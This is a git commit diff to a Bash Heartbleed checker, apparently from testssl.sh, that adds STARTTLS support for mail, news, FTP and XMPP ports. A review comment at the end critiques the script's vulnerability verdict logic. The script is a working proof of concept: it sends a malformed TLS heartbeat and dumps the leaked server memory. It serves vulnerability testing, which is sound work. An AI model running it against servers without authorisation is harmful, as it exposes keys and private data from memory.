works also for nntp,ftp,imap,pop,xmpp +starttls now

Dirk 2015-07-01 13:01:16 +02:00
parent 83dc3f707f
commit 21119d6d01


@ -10,23 +10,23 @@
readonly PS4='${LINENO}: ${FUNCNAME[0]:+${FUNCNAME[0]}(): }' readonly PS4='${LINENO}: ${FUNCNAME[0]:+${FUNCNAME[0]}(): }'
NODE="" [ -z "$1" ] && exit 1
NODE="$1"
PORT="443" PORT="443"
SLEEP=2 SLEEP=2
MAXSLEEP=10
SOCKREPLY="" SOCKREPLY=""
COL_WIDTH=32 COL_WIDTH=32
[ -z "$1" ] && exit 1
# TLS 1.0=x01 1.1=0x02, 1.2=0x3 # TLS 1.0=x01 1.1=0x02, 1.2=0x3
# the PoC contains per default only check for TLS1.0 as the is the least common denominator
TLSV=${2:-01} TLSV=${2:-01}
heartbleed_payload="\x18\x03\x$TLSV\x00\x03\x01\x40\x00" heartbleed_payload="\x18\x03\x$TLSV\x00\x03\x01\x40\x00"
## ^^^^^^^ this is the thing! ## ^^^^^^^ this is the whole thing!
client_hello=" client_hello="
# TLS header ( 5 bytes) # TLS header (5 bytes)
,x16, # Content type (x16 for handshake) ,x16, # Content type (x16 for handshake)
x03, x$TLSV, # TLS Version x03, x$TLSV, # TLS Version
x00, xdc, # Length x00, xdc, # Length
@ -73,12 +73,11 @@ x00, x23, x00, x00,
# Extension: Heartbeat # Extension: Heartbeat
x00, x0f, x00, x01, x01 x00, x0f, x00, x01, x01
" "
msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'` #msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'`
msg=$(echo "$client_hello" | sed -e 's/# .*$//g' -e 's/ //g' | sed -E 's/^[[:space:]]+//; s/[[:space:]]+$//; /^$/d' | sed 's/,/\\/g' | tr -d '\n')
parse_hn_port() { parse_hn_port() {
NODE="$1"
# strip "https", supposed it was supplied additionally # strip "https", supposed it was supplied additionally
echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' ` echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' `
@ -87,7 +86,6 @@ parse_hn_port() {
# determine port, supposed it was supplied additionally # determine port, supposed it was supplied additionally
echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed 's/\:.*$//'` echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed 's/\:.*$//'`
echo -e "\n===> connecting to $NODE:$PORT\n" echo -e "\n===> connecting to $NODE:$PORT\n"
} }
@ -117,12 +115,7 @@ socksend() {
sockread() { sockread() {
reply=$(dd bs=$1 count=1 <&5 2>/dev/null) [[ "x$2" == "x" ]] && maxsleep=$MAXSLEEP || maxsleep=$2
wait_kill $! $SLEEP
}
sockread1() {
[[ "x$2" == "x" ]] && maxsleep=10 || maxsleep=$2
ret=0 ret=0
ddreply=$(mktemp /tmp/ddreply.XXXXXX) || return 7 ddreply=$(mktemp /tmp/ddreply.XXXXXX) || return 7
@ -136,6 +129,7 @@ sockread1() {
} }
# arg1: string to send # arg1: string to send
# arg2: success string, yet to be parsed
starttls_line0() { starttls_line0() {
echo "$1" >&5 echo "$1" >&5
cat <&5 & cat <&5 &
@ -152,6 +146,11 @@ starttls_line1() {
done done
} }
fixme(){
tput bold; tput setaf 5; echo -e "\n$1\n"; tput sgr0
}
fd_socket(){ fd_socket(){
if ! exec 5<> /dev/tcp/$NODE/$PORT; then if ! exec 5<> /dev/tcp/$NODE/$PORT; then
echo "`basename $0`: unable to connect to $NODE:$PORT" echo "`basename $0`: unable to connect to $NODE:$PORT"
@ -159,11 +158,41 @@ fd_socket(){
fi fi
case "$1" in # port case "$1" in # port
25) starttls_line0 "EHLO testssl.sh" 21) # https://tools.ietf.org/html/rfc4217
starttls_line0 "STARTTLS" starttls_line0 "FEAT"
starttls_line0 "AUTH TLS"
;;
25) #https://tools.ietf.org/html/rfc4217
starttls_line0 "EHLO testssl.sh" "250"
starttls_line0 "STARTTLS" "220"
;;
110) # https://tools.ietf.org/html/rfc2595
starttls_line0 "STLS" "OK"
;;
119|433) # https://tools.ietf.org/html/rfc4642
starttls_line0 "CAPABILITIES" "101"
starttls_line0 "STARTTLS" "382"
;;
143) # https://tools.ietf.org/html/rfc2595
starttls_line0 "a001 CAPABILITY" "OK"
starttls_line0 "a002 STARTTLS" "OK"
;;
389) # https://tools.ietf.org/html/rfc2830, https://tools.ietf.org/html/rfc4511
fixme "LDAP: FIXME not yet implemented"
exit 1
;;
674) # https://tools.ietf.org/html/rfc2595
fixme "ACAP: FIXME not yet implemented"
exit 1
;;
5222)
starttls_line0 "<starttls xmlns='urn:ietf:params:xml:ns:xmpp-tls'/>" "proceed"
fixme "XMPP: FIXME not yet implemented"
;;
443|995|993|465|*) # we don't need a special command here
;; ;;
443|*) ;;
esac esac
echo
} }
close_socket(){ close_socket(){
@ -182,12 +211,14 @@ echo "##### sending standard client hello with TLS version 03,$TLSV:"
socksend "$msg" $TLSV socksend "$msg" $TLSV
sockread 16384 sockread 16384
#sockread 10000
echo "##### reading server hello:" echo "##### reading server hello:"
#cat $SOCKREPLY | xxd | head -20 echo "$SOCKREPLY" | xxd -c$COL_WIDTH | head -10
echo -e "$reply" | xxd | head -2
echo "[...]" echo "[...]"
echo echo
if [ 1 -ge $(echo "$SOCKREPLY" | xxd | wc -l) ]; then
tput bold; tput setaf 5; echo "TLS handshake failed"; tput sgr0
exit 1
fi
echo "###### sending payload with TLS version 03,$TLSV:" echo "###### sending payload with TLS version 03,$TLSV:"
socksend $heartbleed_payload $TLSV socksend $heartbleed_payload $TLSV
@ -195,12 +226,10 @@ socksend $heartbleed_payload $TLSV
sockread 65534 sockread 65534
echo "###### heartbleed reply: " echo "###### heartbleed reply: "
echo "=============================" echo "============================="
#cat $SOCKREPLY | xxd | head -20 echo "$SOCKREPLY" | xxd -c$COL_WIDTH | head -20
echo -e "$reply" | xxd -c$COL_WIDTH
echo "=============================" echo "============================="
lines_returned=`echo -e "$reply" | xxd | wc -l` if [ $(echo "$SOCKREPLY" | xxd | wc -l) -gt 1 ]; then
if [ $lines_returned -gt 1 ]; then
tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0 tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0
ret=1 ret=1
else else
@ -213,5 +242,5 @@ close_socket
exit $ret exit $ret
# vim:tw=100:ts=5:sw=5 # vim:tw=100:ts=5:sw=5:expandtab
# $Id: heartbleed.bash,v 1.9 2015/07/01 08:12:36 dirkw Exp $ # $Id: heartbleed.bash,v 1.11 2015/07/01 10:56:57 dirkw Exp $
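Review bot: The VULNERABLE verdict near the end, `if [ $(echo "$SOCKREPLY" | xxd | wc -l) -gt 1 ]`, fires on any reply longer than one xxd row, and with the new STARTTLS branches in fd_socket that reply can be a plain-text protocol response, because the success strings passed to starttls_line0 are, by the commit's own comment, "yet to be parsed". The added "TLS handshake failed" guard only rejects an empty or one-row reply, so a refused STARTTLS followed by an error line would likely pass both checks and be reported as vulnerable. Consider also requiring the reply to begin with the heartbeat content type the payload itself uses, e.g. `[[ "$(echo "$SOCKREPLY" | xxd -p | head -c 2)" == "18" ]]`; this assumes SOCKREPLY holds the raw reply, which cannot be confirmed here because sockread's body lies outside the visible hunks. The 5222 branch also prints "XMPP: FIXME not yet implemented" without the `exit 1` that the 389 and 674 branches have, so an XMPP run continues to a verdict the script itself says it cannot support yet.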